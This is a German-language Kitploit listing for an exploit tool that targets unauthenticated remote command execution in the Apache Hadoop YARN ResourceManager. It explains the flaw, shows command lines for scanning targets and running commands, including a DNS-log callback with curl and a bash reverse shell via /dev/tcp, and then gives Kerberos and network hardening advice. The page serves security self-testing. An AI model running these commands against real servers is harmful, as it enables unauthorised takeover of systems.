Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Hadoop-Yarn-ResourceManager-RCE — Hadoop Yan ResourceManager unauthorized RCE | Kitploit
Tools/GitHubGitHub/al1ex/hadoop-yarn-resourcemanager-rce
Vulnerability ScannersVulnerability AnalysisExploitationPenetration TestingRed TeamingRemote Access Tool
GitHubal1ex/hadoop-yarn-resourcemanager-rce

Hadoop-Yarn-ResourceManager-RCE

Hadoop Yan ResourceManager unauthorized RCE

Repository anzeigen
3914vor 4 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Auswirkungen der Schwachstelle

Im Hadoop yarn ResourceManager gab es eine Schwachstelle für unbefugten Zugriff. Diese Schwachstelle bestand in Hadoop yarn, der Kernkomponente von Hadoop. Da Hadoop yarn den RPC-Dienst standardmäßig öffentlich zugänglich machte, konnte ein entfernter Angreifer diese Schwachstelle für unbefugten Zugriff ausnutzen und über den RPC-Dienst beliebige Befehle ausführen, um den Zielserver zu kontrollieren. Angesichts des hohen Risikostatus und des großen Schadens dieser Schwachstelle sowie der Tatsache, dass die Details bereits offengelegt und ausgenutzt wurden, wird allen Benutzern von Apache Hadoop empfohlen, eine Selbstprüfung durchzuführen und rechtzeitig Sicherheitsmaßnahmen zu ergreifen.

Betroffenes Produkt

Apache Hadoop Yarn *

Schwachstellen-Check

Grundlegende Verwendung

root@kitploit:~
python3 Hadoop_Yan_RPC_RCE.py

img

Prüfung auf Schwachstellen

root@kitploit:~
python3 Hadoop_Yan_RPC_RCE.py -v true -t http://www.target.com 

img

Befehlsausführung

root@kitploit:~
python3 Hadoop_Yan_RPC_RCE.py -a true -t http://www.target.com  -c "curl xxx.dnslog.cn"

attack

dnslog

Stapelscan

root@kitploit:~
python3 Hadoop_Yan_RPC_RCE.py -s true -f target.txt

scan_result

Reverse Shell

root@kitploit:~
python3 Hadoop_Yan_RPC_RCE.py -a true -t http://www.target.com -c "bash -i >& /dev/tcp/ip/port 0>&1"

reverse_shell1

Referenzen

https://nosec.org/home/detail/4905.html

https://github.com/N0b1ta/Bit-Cannon/tree/master/Apache/Hadoop/YARN/hadoop-yarn-rest-api-unauth

Sicherheitshinweise

1.Aktivieren Sie die Kerberos-Authentifizierung, um unbefugten Zugriff zu verhindern.

root@kitploit:~
<property>
    <name>hadoop.security.authentication</name>
    <value>kerberos</value>
    <final>false</final>
    <source>core-site.xml</source>
</property>...
<property>
    <name>hadoop.rpc.protection</name>
    <value>authentication</value>
    <final>false</final>
    <source>core-default.xml</source>
</property>

2.Verhindern Sie, dass externe Adressen auf die zugehörigen Ports des Hadoop-RPC-Dienstes zugreifen, oder konfigurieren Sie diese so, dass sie nur für vertrauenswürdige Adressen geöffnet sind.

Feierliche Erklärung: Verwenden Sie dieses Tool nicht für illegale Aktivitäten. Dieses Tool dient ausschließlich der Sicherheits-Selbstprüfung durch das Personal der Partei A und das Personal der Partei B. Wenn der Benutzer es illegal verwendet, trägt der Benutzer die rechtliche Verantwortung!!!.

Tool herunterladen